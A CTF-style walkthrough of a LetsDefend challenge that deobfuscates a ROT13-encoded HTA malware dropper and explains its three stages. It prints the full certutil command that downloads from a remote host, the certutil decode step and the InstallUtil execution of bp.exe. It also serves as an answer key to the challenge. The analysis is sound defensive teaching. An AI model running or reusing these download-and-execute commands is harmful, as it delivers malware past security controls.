Back to Walkthroughs
Obfuscated HTA
Let's Defend Malware Analysis [Easy]Easy

Obfuscated HTA

#tutorial

Challenge Description

image

Solution and Analysis

First unzip the password protected archive to the get the .HTA file. Open the file in notepad++

Question 1: What is the deobfuscated result of the sample in str1?

To answer this open the file in notepad++ and look at line 14

image

However it is ROT13 encrypted, to decrypt it use any online ROT13 decrypted, I used cyberchef and got this result

image

Which is the answer to the question

Question 2: After deobfuscating the sample in str2, what is the resulting output?

To answer this go to line 45 where the value of sample is stored in str2 as shown below

image

it is also encrypted with ROT13 use the same tool you used previously to decrypt it

image

and that is the answer

Question 3: What is the deobfuscated result of sample in str3?

just decrypt the value in str3 using ROT13 like the previous ones to get the answer

image

Question 4: What does the sample in str4 translate to after deobfuscation?

Decrypt the same, it is encrypted using ROT13

image

Question 5: What is the deobfuscated result of sample in str5?

Same method as the previous ones

image

Question 6: What is the deobfuscated value of the "wobj" variable?

Same logic decrypt it using rot13

image

Question 7: What is the purpose of the cmd variable in the script?

this is the CMD variable

cmd = "%comspec% /v /c \"set t=" + str3 + "&&" + str1 + "!t!" + str2 + "\"";

just add in the variables stored in str3 str2 and str1 to combine the full command

%comspec% /v /c "set t=http://&&certutil.exe -urlcache -split -f!t!192.168.49.122:8080/file.txt C:\Windows\Tasks\file.txt"

Question 8: What is the second command executed by the "ActiveXObject"

This is stored under str4 variable

What does the malware do?

This HTA file is a multi-stage malware dropper. Its primary function is to download a malicious payload from a remote server, decode it, and execute it on the victim's machine. It employs several common obfuscation and defense evasion techniques to avoid detection by security software. The entire attack is automated and occurs silently in the background once the HTA file is opened.

Core Techniques: Obfuscation and Execution

The script relies on two fundamental components to achieve its goal.

1. Obfuscation

The script's main defense is hiding its true intent.

  • ROT13 Cipher: All critical strings—commands, file paths, and URLs—are encoded using a simple ROT13 cipher. They are never stored in plain text.
  • Runtime Deobfuscation: The scram() function acts as the ROT13 decoder. It translates the encoded strings into executable commands only when the script is running, bypassing static analysis tools that scan file contents for malicious keywords.

2. Execution Engine

The script uses a legitimate Windows component to interact with the operating system.

  • ActiveXObject("Wscript.shell"): The deobfuscated wobj variable creates an instance of the Windows Script Host Shell. This powerful object allows the JScript code to run system commands with the same privileges as the user, effectively bridging the gap between the HTA script and the underlying OS.

The Three-Stage Attack Chain

The script executes a sequence of three distinct commands, as laid out in the code's comments and structure.

Stage 1: Delivery – Downloading the Payload

This stage is initiated by the first ex.Run(cmd) call and is responsible for fetching the malware from a command-and-control (C2) server.

  • Assembled Command (cmd): 
    %comspec% /v /c "set t=http://&& certutil.exe -urlcache -split -f !t!192.168.49.122:8080/file.txt C:\Windows\Tasks\file.txt"
  • Execution Analysis:
    1. The command first creates a temporary environment variable t with the value http://. This is an evasion technique to avoid having the full URL visible in one string.
    2. It then uses certutil.exe, a legitimate Windows utility, to download a file. This is a "Living Off the Land" (LOLBin) technique.
    3. The final, effective command executed is: 
      certutil.exe -urlcache -split -f http://192.168.49.122:8080/file.txt C:\Windows\Tasks\file.txt
  • Outcome: An encoded payload named file.txt is downloaded and saved to C:\Windows\Tasks\.

Stage 2: Setup – Decoding the Payload

This stage, executed by ex.Run(cmd2), prepares the downloaded file for execution.

  • Deobfuscated Command (str4): 
    certutil -decode C:\Windows\Tasks\file.txt C:\Windows\Tasks\bp.exe
  • Execution Analysis: The script once again uses certutil.exe. The -decode flag instructs it to process file.txt (which is likely Base64 encoded) and write the decoded binary content to a new file.
  • Outcome: The encoded file.txt is decoded into a malicious executable file named bp.exe.

Stage 3: Execution – Running the Malware

This is the final stage, executed by ex.Run(cmd3), which runs the malicious payload.

  • Deobfuscated Command (str5): 
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bp.exe
  • Execution Analysis: Instead of running bp.exe directly, the attacker uses another LOLBin, InstallUtil.exe. This legitimate .NET Framework utility is often abused by malware to execute code in a way that can bypass application whitelisting and some antivirus heuristics. The /U (uninstall) switch is a common trigger for this malicious execution.
  • Outcome: The malicious payload bp.exe is executed on the system.

Conclusion: End-to-End Attack Flow

From the moment the user opens the HTA file, the following occurs silently:

  1. The script decodes a series of hidden commands.
  2. It downloads an encoded file (file.txt) using certutil.exe.
  3. It decodes the file into an executable (bp.exe), again using certutil.exe.
  4. It executes the malware using a trusted system utility (InstallUtil.exe) to evade detection.
  5. The HTA window closes itself (self.close()) to remove any visual indicator that it was ever run.